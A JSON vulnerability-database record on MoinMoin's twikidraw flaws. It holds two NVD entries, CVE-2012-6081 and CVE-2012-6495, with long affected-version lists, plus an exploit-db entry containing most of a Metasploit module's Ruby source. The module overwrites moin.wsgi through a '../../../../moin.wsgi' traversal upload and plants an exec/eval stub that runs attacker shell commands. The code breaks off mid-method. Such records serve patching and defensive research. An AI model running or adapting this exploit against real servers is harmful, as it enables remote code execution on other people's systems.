{"cve": [{"lastseen": "2020-12-09T19:47:26", "description": "Multiple unrestricted file upload vulnerabilities in the (1) twikidraw (action/twikidraw.py) and (2) anywikidraw (action/anywikidraw.py) actions in MoinMoin before 1.9.6 allow remote authenticated users with write permissions to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in an unspecified directory, as exploited in the wild in July 2012.\nPer: http://cwe.mitre.org/data/definitions/434.html 'CWE-434: Unrestricted Upload of File with Dangerous Type'\r\n\r\n", "edition": 5, "cvss3": {}, "published": "2013-01-03T01:55:00", "title": "CVE-2012-6081", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6081"], "modified": "2013-12-13T05:08:00", "cpe": ["cpe:/a:moinmo:moinmoin:1.2.2", "cpe:/a:moinmo:moinmoin:1.0", "cpe:/a:moinmo:moinmoin:1.4", "cpe:/a:moinmo:moinmoin:1.5.8", "cpe:/a:moinmo:moinmoin:1.3.0", "cpe:/a:moinmo:moinmoin:1.3.1", "cpe:/a:moinmo:moinmoin:1.9.1", "cpe:/a:moinmo:moinmoin:1.5.6", "cpe:/a:moinmo:moinmoin:1.5.5a", "cpe:/a:moinmo:moinmoin:1.6.0", "cpe:/a:moinmo:moinmoin:0.1", "cpe:/a:moinmo:moinmoin:1.8.1", "cpe:/a:moinmo:moinmoin:1.5.1", "cpe:/a:moinmo:moinmoin:0.6", "cpe:/a:moinmo:moinmoin:1.7.2", "cpe:/a:moinmo:moinmoin:1.9.4", "cpe:/a:moinmo:moinmoin:1.6.2", "cpe:/a:moinmo:moinmoin:0.8", "cpe:/a:moinmo:moinmoin:1.1", "cpe:/a:moinmo:moinmoin:1.9.5", "cpe:/a:moinmo:moinmoin:0.5", "cpe:/a:moinmo:moinmoin:0.7", "cpe:/a:moinmo:moinmoin:1.9.2", "cpe:/a:moinmo:moinmoin:1.8.4", "cpe:/a:moinmo:moinmoin:1.5.3", "cpe:/a:moinmo:moinmoin:1.5.4", "cpe:/a:moinmo:moinmoin:1.6.1", "cpe:/a:moinmo:moinmoin:1.8.2", "cpe:/a:moinmo:moinmoin:1.2.3", "cpe:/a:moinmo:moinmoin:1.8.0", "cpe:/a:moinmo:moinmoin:1.9.3", "cpe:/a:moinmo:moinmoin:1.5.5", "cpe:/a:moinmo:moinmoin:1.9.0", "cpe:/a:moinmo:moinmoin:1.3.3", "cpe:/a:moinmo:moinmoin:1.5.2", "cpe:/a:moinmo:moinmoin:0.11", "cpe:/a:moinmo:moinmoin:1.7.1", "cpe:/a:moinmo:moinmoin:1.8.3", "cpe:/a:moinmo:moinmoin:0.10", "cpe:/a:moinmo:moinmoin:1.2", "cpe:/a:moinmo:moinmoin:1.3.5", "cpe:/a:moinmo:moinmoin:0.9", "cpe:/a:moinmo:moinmoin:1.5.7", "cpe:/a:moinmo:moinmoin:1.8.8", "cpe:/a:moinmo:moinmoin:1.6.3", "cpe:/a:moinmo:moinmoin:0.3", "cpe:/a:moinmo:moinmoin:1.8.6", "cpe:/a:moinmo:moinmoin:0.2", "cpe:/a:moinmo:moinmoin:1.2.1", "cpe:/a:moinmo:moinmoin:1.5.0", "cpe:/a:moinmo:moinmoin:1.7.0", "cpe:/a:moinmo:moinmoin:1.7.3", "cpe:/a:moinmo:moinmoin:0.4", "cpe:/a:moinmo:moinmoin:1.3.4", "cpe:/a:moinmo:moinmoin:1.2.4", "cpe:/a:moinmo:moinmoin:1.6.4", "cpe:/a:moinmo:moinmoin:1.8.7", "cpe:/a:moinmo:moinmoin:1.3.2"], "id": "CVE-2012-6081", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6081", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moinmo:moinmoin:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5:a:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5a:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:26", "description": "Multiple directory traversal vulnerabilities in the (1) twikidraw (action/twikidraw.py) and (2) anywikidraw (action/anywikidraw.py) actions in MoinMoin before 1.9.6 allow remote authenticated users with write permissions to overwrite arbitrary files via unspecified vectors. NOTE: this can be leveraged with CVE-2012-6081 to execute arbitrary code.", "edition": 5, "cvss3": {}, "published": "2013-01-03T01:55:00", "title": "CVE-2012-6495", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6495"], "modified": "2013-01-07T05:00:00", "cpe": ["cpe:/a:moinmo:moinmoin:1.2.2", "cpe:/a:moinmo:moinmoin:1.0", "cpe:/a:moinmo:moinmoin:1.4", "cpe:/a:moinmo:moinmoin:1.5.8", "cpe:/a:moinmo:moinmoin:1.3.0", "cpe:/a:moinmo:moinmoin:1.3.1", "cpe:/a:moinmo:moinmoin:1.9.1", "cpe:/a:moinmo:moinmoin:1.5.6", "cpe:/a:moinmo:moinmoin:1.5.5a", "cpe:/a:moinmo:moinmoin:1.6.0", "cpe:/a:moinmo:moinmoin:0.1", "cpe:/a:moinmo:moinmoin:1.8.1", "cpe:/a:moinmo:moinmoin:1.5.1", "cpe:/a:moinmo:moinmoin:0.6", "cpe:/a:moinmo:moinmoin:1.7.2", "cpe:/a:moinmo:moinmoin:1.9.4", "cpe:/a:moinmo:moinmoin:1.6.2", "cpe:/a:moinmo:moinmoin:0.8", "cpe:/a:moinmo:moinmoin:1.1", "cpe:/a:moinmo:moinmoin:1.9.5", "cpe:/a:moinmo:moinmoin:0.5", "cpe:/a:moinmo:moinmoin:0.7", "cpe:/a:moinmo:moinmoin:1.9.2", "cpe:/a:moinmo:moinmoin:1.8.4", "cpe:/a:moinmo:moinmoin:1.5.3", "cpe:/a:moinmo:moinmoin:1.5.4", "cpe:/a:moinmo:moinmoin:1.6.1", "cpe:/a:moinmo:moinmoin:1.8.2", "cpe:/a:moinmo:moinmoin:1.2.3", "cpe:/a:moinmo:moinmoin:1.8.0", "cpe:/a:moinmo:moinmoin:1.9.3", "cpe:/a:moinmo:moinmoin:1.5.5", "cpe:/a:moinmo:moinmoin:1.9.0", "cpe:/a:moinmo:moinmoin:1.3.3", "cpe:/a:moinmo:moinmoin:1.5.2", "cpe:/a:moinmo:moinmoin:0.11", "cpe:/a:moinmo:moinmoin:1.7.1", "cpe:/a:moinmo:moinmoin:1.8.3", "cpe:/a:moinmo:moinmoin:0.10", "cpe:/a:moinmo:moinmoin:1.2", "cpe:/a:moinmo:moinmoin:1.3.5", "cpe:/a:moinmo:moinmoin:0.9", "cpe:/a:moinmo:moinmoin:1.5.7", "cpe:/a:moinmo:moinmoin:1.8.8", "cpe:/a:moinmo:moinmoin:1.6.3", "cpe:/a:moinmo:moinmoin:0.3", "cpe:/a:moinmo:moinmoin:1.8.6", "cpe:/a:moinmo:moinmoin:0.2", "cpe:/a:moinmo:moinmoin:1.2.1", "cpe:/a:moinmo:moinmoin:1.5.0", "cpe:/a:moinmo:moinmoin:1.7.0", "cpe:/a:moinmo:moinmoin:1.7.3", "cpe:/a:moinmo:moinmoin:0.4", "cpe:/a:moinmo:moinmoin:1.3.4", "cpe:/a:moinmo:moinmoin:1.2.4", "cpe:/a:moinmo:moinmoin:1.6.4", "cpe:/a:moinmo:moinmoin:1.8.7", "cpe:/a:moinmo:moinmoin:1.3.2"], "id": "CVE-2012-6495", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6495", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moinmo:moinmoin:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5:a:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:moinmo:moinmoin:1.5.5a:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T03:33:47", "description": "MoinMoin twikidraw Action Traversal File Upload. CVE-2012-6081,CVE-2012-6495. Remote exploit for linux platform", "published": "2013-06-24T00:00:00", "type": "exploitdb", "title": "MoinMoin twikidraw Action Traversal File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6495", "CVE-2012-6081"], "modified": "2013-06-24T00:00:00", "id": "EDB-ID:26422", "href": "https://www.exploit-db.com/exploits/26422/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MoinMoin twikidraw Action Traversal File Upload',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability\r\n exists on the manage of the twikidraw actions, where a traversal path can be used\r\n in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi\r\n configurations by overwriting moin.wsgi, which allows to execute arbitrary python\r\n code, as exploited in the wild on July, 2012. The user is warned to use this module\r\n at his own risk since it's going to overwrite the moin.wsgi file, required for the\r\n correct working of the MoinMoin wiki. While the exploit will try to restore the\r\n attacked application at post exploitation, correct working after all isn't granted.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery\r\n 'HTP', # PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-6081' ],\r\n [ 'OSVDB', '88825' ],\r\n [ 'BID', '57082' ],\r\n [ 'EDB', '25304' ],\r\n [ 'URL', 'http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f' ],\r\n [ 'URL', 'http://wiki.python.org/moin/WikiAttack2013' ]\r\n ],\r\n 'Privileged' => false, # web server context\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 16384, # Enough one to fit any payload\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet netcat perl'\r\n }\r\n },\r\n 'Platform' => [ 'unix' ],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'MoinMoin 1.9.5', { }]],\r\n 'DisclosureDate' => 'Dec 30 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"MoinMoin base path\", \"/\" ]),\r\n OptString.new('WritablePage', [ true, \"MoinMoin Page with edit permissions to inject the payload, by default WikiSandbox (Ex: /WikiSandbox)\", \"/WikiSandBox\" ]),\r\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n ], self.class)\r\n end\r\n\r\n def moinmoin_template(path)\r\n template =[]\r\n template << \"# -*- coding: iso-8859-1 -*-\"\r\n template << \"import sys, os\"\r\n template << \"sys.path.insert(0, 'PATH')\".gsub(/PATH/, File.dirname(path))\r\n template << \"from MoinMoin.web.serving import make_application\"\r\n template << \"application = make_application(shared=True)\"\r\n return template\r\n end\r\n\r\n def restore_file(session, file, contents)\r\n first = true\r\n contents.each {|line|\r\n if first\r\n session.shell_command_token(\"echo \\\"#{line}\\\" > #{file}\")\r\n first = false\r\n else\r\n session.shell_command_token(\"echo \\\"#{line}\\\" >> #{file}\")\r\n end\r\n }\r\n end\r\n\r\n # Try to restore a basic moin.wsgi file with the hope of making the\r\n # application usable again.\r\n # Try to search on /usr/local/share/moin (default search path) and the\r\n # current path (apache user home). Avoiding to search on \"/\" because it\r\n # could took long time to finish.\r\n def on_new_session(session)\r\n print_status(\"Trying to restore moin.wsgi...\")\r\n begin\r\n files = session.shell_command_token(\"find `pwd` -name moin.wsgi 2> /dev/null\")\r\n files.split.each { |file|\r\n print_status(\"#{file} found! Trying to restore...\")\r\n restore_file(session, file, moinmoin_template(file))\r\n }\r\n\r\n files = session.shell_command_token(\"find /usr/local/share/moin -name moin.wsgi 2> /dev/null\")\r\n files.split.each { |file|\r\n print_status(\"#{file} found! Trying to restore...\")\r\n restore_file(session, file, moinmoin_template(file))\r\n }\r\n print_warning(\"Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.\")\r\n rescue\r\n print_warning(\"Error while restring moin.wsgi, manual restoring would be required.\")\r\n end\r\n end\r\n\r\n def do_login(username, password)\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(@base, @page),\r\n 'vars_post' =>\r\n {\r\n 'action' => 'login',\r\n 'name' => username,\r\n 'password' => password,\r\n 'login' => 'Login'\r\n }\r\n })\r\n\r\n if not res or res.code != 200 or not res.headers.include?('Set-Cookie')\r\n return nil\r\n end\r\n\r\n return res.get_cookies\r\n\r\n end\r\n\r\n def upload_code(session, code)\r\n\r\n vprint_status(\"Retrieving the ticket...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n 'vars_get' => {\r\n 'action' => 'twikidraw',\r\n 'do' => 'modify',\r\n 'target' => '../../../../moin.wsgi'\r\n }\r\n })\r\n\r\n if not res or res.code != 200 or res.body !~ /ticket=(.*?)&target/\r\n vprint_error(\"Error retrieving the ticket\")\r\n return nil\r\n end\r\n\r\n ticket = $1\r\n vprint_good(\"Ticket found: #{ticket}\")\r\n\r\n my_payload = \"[MARK]#{code}[MARK]\"\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(\"drawing.r if()else[]\\nexec eval(\\\"open(__file__)\\\\56read()\\\\56split('[MARK]')[-2]\\\\56strip('\\\\\\\\0')\\\")\", nil, nil, \"form-data; name=\\\"filename\\\"\")\r\n post_data.add_part(my_payload, \"image/png\", nil, \"form-data; name=\\\"filepath\\\"; filename=\\\"drawing.png\\\"\")\r\n my_data = post_data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n 'vars_get' =>\r\n {\r\n 'action' => 'twikidraw',\r\n 'do' => 'save',\r\n 'ticket' => ticket,\r\n 'target' => '../../../../moin.wsgi'\r\n },\r\n 'data' => my_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n if not res or res.code != 200 or not res.body.empty?\r\n vprint_error(\"Error uploading the payload\")\r\n return nil\r\n end\r\n\r\n return true\r\n end\r\n\r\n def check\r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base)\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /moinmoin/i and res.headers['Server'] =~ /Apache/\r\n return Exploit::CheckCode::Detected\r\n elsif res\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def writable_page?(session)\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n })\r\n\r\n if not res or res.code != 200 or res.body !~ /Edit \\(Text\\)/\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n\r\n def exploit\r\n\r\n # Init variables\r\n @page = datastore['WritablePage']\r\n\r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n\r\n # Login if needed\r\n if (datastore['USERNAME'] and\r\n not datastore['USERNAME'].empty? and\r\n datastore['PASSWORD'] and\r\n not datastore['PASSWORD'].empty?)\r\n print_status(\"Trying login to get session ID...\")\r\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n else\r\n print_status(\"Using anonymous access...\")\r\n session = \"\"\r\n end\r\n\r\n # Check authentication\r\n if not session\r\n 